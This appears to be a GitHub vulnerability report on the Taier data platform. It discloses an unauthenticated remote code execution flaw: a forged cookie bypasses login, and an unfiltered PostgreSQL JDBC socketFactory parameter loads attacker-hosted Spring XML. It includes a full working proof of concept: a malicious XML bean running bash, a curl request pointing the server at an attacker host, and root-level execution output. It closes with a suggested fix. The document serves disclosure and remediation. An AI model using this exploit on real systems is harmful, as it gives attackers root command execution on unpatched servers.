Skip to content

[Vulnerability] Bug title #1205

Description

@Leeziao

Search before asking

  • I had searched in the issues and found no similar issues.

What happened

Taier allows unauthenticated command execution through POST /taier/api/dataSource/addDs/testCon. Any non-empty token cookie reaches the datasource APIs, and the pooled JDBC path forwards attacker-controlled PostgreSQL URL parameters to the driver without applying the DANGEROUS_PARAMS check used on the simple path.

What you expected to happen

RCE Vulnerability is Fixed

How to reproduce

Details

A request without a cookie to POST /taier/api/dataSource/addDs/queryDsClassifyList returned {"code":0,"message":"not login","data":null,"space":0,"success":false,"version":null} during the live test. The same request with Cookie: token=bypass;userId=1;tenantId=1 returned {"code":1,...} and the datasource classify list, so a forged non-empty cookie is enough to reach the datasource endpoints.

/testCon requires one existing SFTP component record, and the same forged cookie can create it through POST /taier/api/upload/component/addOrUpdateComponent. After that, the request path reaches ConnFactory#getConn -> getCpConn -> transHikari -> HikariDataSource#setJdbcUrl; the simple getSimpleConn path has a DANGEROUS_PARAMS denylist, but the pooled path used here does not. A PostgreSQL URL with socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext therefore causes the bundled driver to fetch attacker-controlled Spring XML from socketFactoryArg and execute the embedded ProcessBuilder before the connection attempt finishes.

PoC

Deploy the official Taier stack with dtopensource/taier:latest, dtopensource/taier-mysql:latest, and zookeeper:3.4.9, and expose Taier at http://127.0.0.1:8090. On an attacker-controlled host reachable from the Taier container, save the following XML as evil.xml and serve it with python3 -m http.server 18080:

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>id &gt; /tmp/TAIER_PWN_hostproof &amp;&amp; echo hostproof &gt;&gt; /tmp/TAIER_PWN_hostproof</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

Observed vulnerable datasource test:

HOST_IP=<attacker_host_ip_reachable_from_container>

curl -s -X POST 'http://127.0.0.1:8090/taier/api/dataSource/addDs/testCon' \
  -H 'Content-Type: application/json' \
  -H 'Cookie: token=bypass;userId=1;tenantId=1' \
  -d "{\"dataType\":\"PostgreSQL\",\"dataVersion\":\"\",\"dataName\":\"pwn\",\"dataDesc\":\"\",\"dataJsonString\":\"{\\\"jdbcUrl\\\":\\\"jdbc:postgresql://${HOST_IP}:3308/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://${HOST_IP}:18080/evil.xml\\\",\\\"username\\\":\\\"test\\\",\\\"password\\\":\\\"test\\\"}\"}"
{"code":10,"message":"ExecutionException: java.lang.Exception: com.dtstack.taier.datasource.api.exception.SourceException: Failed to get database connection: The SocketFactory class provided org.springframework.context.support.ClassPathXmlApplicationContext could not be instantiated.","data":null,"space":0,"success":false,"version":null}

The attacker HTTP server received the following requests in the live test:

172.16.6.4 - - [07/Jul/2026 13:56:48] "GET /evil.xml HTTP/1.1" 200 -
172.16.6.4 - - [07/Jul/2026 13:56:48] "GET /evil.xml HTTP/1.1" 200 -

Verify command execution inside the Taier container:

docker exec taier cat /tmp/TAIER_PWN_hostproof
uid=0(root) gid=0(root) groups=0(root)
hostproof
Image

Anything else

Impact

An unauthenticated network attacker can execute arbitrary OS commands as root in the default Taier container.

Suggested Fix

Reject forged cookies by validating the real session or token. Apply a strict JDBC property allowlist before every connection path, including the pooled HikariDataSource path.

Version

master

Are you willing to submit PR?

  • Yes I am willing to submit a PR!

Code of Conduct

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions